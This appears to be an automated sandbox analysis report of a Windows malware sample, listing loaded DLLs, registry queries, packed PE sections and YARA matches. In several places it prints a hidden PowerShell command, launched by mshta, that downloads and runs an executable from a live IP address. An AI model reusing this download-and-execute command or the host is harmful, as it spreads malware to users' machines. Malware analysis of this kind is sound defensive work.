                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: amsi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                                    Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                                    Source: Google Drive.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: YouTube.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Sheets.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Gmail.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Slides.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Docs.lnk.8.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                                    Source: EdYEXasNiR.exeStatic file information: File size 1857024 > 1048576
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dll
                                    Source: EdYEXasNiR.exeStatic PE information: Raw size of ulqubmxb is bigger than: 0x100000 < 0x19b800
                                    Source: Binary string: mozglue.pdbP source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: nss3.pdb@ source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                    Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, cbfb8a9c89.exe, 0000001D.00000000.2226147614.0000000000C32000.00000002.00000001.01000000.00000011.sdmp
                                    Source: Binary string: nss3.pdb source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                    Source: Binary string: mozglue.pdb source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: 696689ce6d.exe, 0000002F.00000003.4293663574.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000000.2339203126.0000000000F7C000.00000002.00000001.01000000.00000016.sdmp, 696689ce6d.exe, 0000002F.00000002.4903441825.0000000000F7C000.00000002.00000001.01000000.00000016.sdmp

                                    Data Obfuscation

                                    barindex
                                    Detected unpacking (changes PE section rights)
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeUnpacked PE file: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack :EW;.rsrc:W;.idata :W;losjkhko:EW;ybfttvsi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;losjkhko:EW;ybfttvsi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeUnpacked PE file: 5.2.456YTTQ213T2RO9QAEYSNNZDL.exe.e70000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 7.2.skotes.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeUnpacked PE file: 28.2.HJEHIJEBKE.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeUnpacked PE file: 65.2.jyidkjkfhjawd.exe.880000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 72.2.483d2fa8a0d53818306efeb32d3.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeUnpacked PE file: 75.2.483d2fa8a0d53818306efeb32d3.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykgekexw:EW;prmmqeqz:EW;.taggant:EW;
                                    Yara detected Babadeda
                                    Source: Yara matchFile source: 19.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 19.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 44.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 56.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 39.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 44.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 56.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 61.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 39.0.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 61.2.f3d6f9fcfe.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe, type: DROPPED
                                    Suspicious powershell command line found
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: random[1].exe.18.drStatic PE information: 0xAAB116B5 [Thu Sep 30 01:13:25 2060 UTC]
                                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                    Source: random[4].exe.18.drStatic PE information: real checksum: 0x1ef104 should be: 0x1e7984
                                    Source: 522bb7a019.exe.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: ad25d67005.exe.18.drStatic PE information: real checksum: 0x0 should be: 0x8816e
                                    Source: cbfb8a9c89.exe.18.drStatic PE information: real checksum: 0x0 should be: 0x9001
                                    Source: 64252d274d.exe.18.drStatic PE information: real checksum: 0x0 should be: 0x88ff0
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: random[1].exe.18.drStatic PE information: real checksum: 0x0 should be: 0x9001
                                    Source: eO7MwvK[1].exe.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: 95ba65f98f.exe.18.drStatic PE information: real checksum: 0x1c85bc should be: 0x1d1c8d
                                    Source: random[3].exe2.18.drStatic PE information: real checksum: 0x1d1368 should be: 0x1ce87e
                                    Source: random[1].exe.3.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: 4c4716526e.exe.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: random[1].exe0.18.drStatic PE information: real checksum: 0x0 should be: 0x88ff0
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: real checksum: 0x0 should be: 0x13ab91
                                    Source: f3d6f9fcfe.exe.18.drStatic PE information: real checksum: 0x0 should be: 0x21d41
                                    Source: eO7MwvK.exe.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: e18644e148.exe.18.drStatic PE information: real checksum: 0x1ef104 should be: 0x1e7984
                                    Source: f2a96255ac.exe.18.drStatic PE information: real checksum: 0x4fdcb4 should be: 0x4f90bd
                                    Source: ccb71f0bac.exe.18.drStatic PE information: real checksum: 0x2bd1e2 should be: 0x2bea10
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: real checksum: 0x4fdcb4 should be: 0x4f90bd
                                    Source: random[2].exe0.18.drStatic PE information: real checksum: 0x0 should be: 0x21d41
                                    Source: random[3].exe0.18.drStatic PE information: real checksum: 0x4fdcb4 should be: 0x4f90bd
                                    Source: random[4].exe0.18.drStatic PE information: real checksum: 0x2bd1e2 should be: 0x2bea10
                                    Source: random[5].exe.18.drStatic PE information: real checksum: 0x0 should be: 0x8816e
                                    Source: 8663788bd2.exe.18.drStatic PE information: real checksum: 0x1d1368 should be: 0x1ce87e
                                    Source: EdYEXasNiR.exeStatic PE information: real checksum: 0x1cf397 should be: 0x1cdad2
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: random[3].exe.18.drStatic PE information: real checksum: 0x1c85bc should be: 0x1d1c8d
                                    Source: skotes.exe.5.drStatic PE information: real checksum: 0x32222a should be: 0x318e71
                                    Source: random[1].exe1.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: random[3].exe1.18.drStatic PE information: real checksum: 0x147442 should be: 0x1ebf52
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: real checksum: 0x441ce7 should be: 0x4464d8
                                    Source: random[4].exe1.18.drStatic PE information: real checksum: 0x441ce7 should be: 0x4464d8
                                    Source: EdYEXasNiR.exeStatic PE information: section name:
                                    Source: EdYEXasNiR.exeStatic PE information: section name: .idata
                                    Source: EdYEXasNiR.exeStatic PE information: section name:
                                    Source: EdYEXasNiR.exeStatic PE information: section name: ulqubmxb
                                    Source: EdYEXasNiR.exeStatic PE information: section name: cfocvtil
                                    Source: EdYEXasNiR.exeStatic PE information: section name: .taggant
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name:
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: .idata
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: losjkhko
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: ybfttvsi
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: .taggant
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name:
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: .idata
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: ykgekexw
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: prmmqeqz
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: .taggant
                                    Source: random[1].exe.3.drStatic PE information: section name:
                                    Source: random[1].exe.3.drStatic PE information: section name: .idata
                                    Source: random[1].exe.3.drStatic PE information: section name: ykgekexw
                                    Source: random[1].exe.3.drStatic PE information: section name: prmmqeqz
                                    Source: random[1].exe.3.drStatic PE information: section name: .taggant
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name:
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: .idata
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: ykgekexw
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: prmmqeqz
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: .taggant
                                    Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                                    Source: freebl3[1].dll.3.drStatic PE information: section name: .00cfg
                                    Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                                    Source: mozglue[1].dll.3.drStatic PE information: section name: .00cfg
                                    Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                                    Source: msvcp140[1].dll.3.drStatic PE information: section name: .didat
                                    Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                                    Source: nss3[1].dll.3.drStatic PE information: section name: .00cfg
                                    Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                                    Source: softokn3[1].dll.3.drStatic PE information: section name: .00cfg
                                    Source: skotes.exe.5.drStatic PE information: section name:
                                    Source: skotes.exe.5.drStatic PE information: section name: .idata
                                    Source: skotes.exe.5.drStatic PE information: section name: ykgekexw
                                    Source: skotes.exe.5.drStatic PE information: section name: prmmqeqz
                                    Source: skotes.exe.5.drStatic PE information: section name: .taggant
                                    Source: random[3].exe.18.drStatic PE information: section name:
                                    Source: random[3].exe.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe.18.drStatic PE information: section name:
                                    Source: random[3].exe.18.drStatic PE information: section name: sxcdrnzu
                                    Source: random[3].exe.18.drStatic PE information: section name: zjhisqmh
                                    Source: random[3].exe.18.drStatic PE information: section name: .taggant
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name:
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: .idata
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name:
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: sxcdrnzu
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: zjhisqmh
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: .taggant
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name:
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: .idata
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: losjkhko
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: ybfttvsi
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[3].exe0.18.drStatic PE information: section name:
                                    Source: random[3].exe0.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe0.18.drStatic PE information: section name: losjkhko
                                    Source: random[3].exe0.18.drStatic PE information: section name: ybfttvsi
                                    Source: random[3].exe0.18.drStatic PE information: section name: .taggant
                                    Source: random[4].exe.18.drStatic PE information: section name:
                                    Source: random[4].exe.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe.18.drStatic PE information: section name:
